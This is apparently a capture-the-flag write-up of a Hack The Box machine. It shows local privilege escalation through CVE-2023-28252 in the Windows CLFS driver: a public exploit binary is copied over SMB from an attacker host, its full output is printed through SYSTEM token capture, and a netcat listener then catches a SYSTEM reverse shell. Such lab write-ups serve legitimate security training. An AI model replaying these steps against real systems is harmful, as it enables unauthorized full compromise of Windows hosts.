CVE-2023-28252


a vulnerability was found in microsoft windows (Operating System). It has been classified as critical. This affects some unknown processing of the component Common Log File System Driver. This is going to have an impact on confidentiality, integrity, and availability.

the vulnerability has been extensively researched by fortra

Exploit


The PoC is available on the Fortra’s GitHub I will download and compile the exploit package

Exploitation


ps c:\Users\sam.emerson\Documents> copy \\10.10.14.4\test\clfs_eop.exe .

Delivery complete over SMB

ps c:\Users\sam.emerson\Documents> .\clfs_eop.exe
.\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10
 
 
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
 
 
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFC5C984240
[+] pool NpAt VirtualAddress -->FFFFC20AA30FF000
[+] MY EPROCESSS FFFFD58F670A31C0
[+] SYSTEM EPROCESSS FFFFD58F5E6FC040
[+] _ETHREAD ADDRESS FFFFD58F612BA080
[+] PREVIOUS MODE ADDRESS FFFFD58F612BA2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80360583220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8036059BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80362F43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF803635C87B0
 
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF80362FDBD00
 
 
PATHS
[+] folder public path = c:\Users\Public
[+] base log file name path= log:C:\Users\Public\14
[+] base file path = c:\Users\Public\14.blf
[+] container file name path = c:\Users\Public\.p_14
Last kernel CLFS address = FFFFC20A952D0000
numero de tags CLFS founded 11
 
Last kernel CLFS address = FFFFC20A9C9CB000
numero de tags CLFS founded 1
 
[+] log file handle: 0000000000000110
[+] pool clfs kernel address: FFFFC20A9C9CB000
 
number of pipes created =5000
 
number of pipes created =4000
TRIGGER START
system_token_value: FFFFC20A9064159B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
#< CLIXML

Executing

ps c:\Users\admin\Desktop\ThemeBleed> .\nc64.exe -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.237] 64114
 
ps c:\Users\sam.emerson\Documents> whoami
nt authority\system
ps c:\Users\sam.emerson\Documents> hostname
aero
ps c:\Users\sam.emerson\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::177
   ipv6 address. . . . . . . . . . . : dead:beef::5aa2:a858:ac20:b1e7
   temporary ipv6 address. . . . . . : dead:beef::9d34:25ac:aeff:695a
   link-local ipv6 address . . . . . : fe80::f370:3a1d:f4c0:2fa%14
   ipv4 address. . . . . . . . . . . : 10.10.11.237
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%14
                                       10.10.10.2

System Level Compromise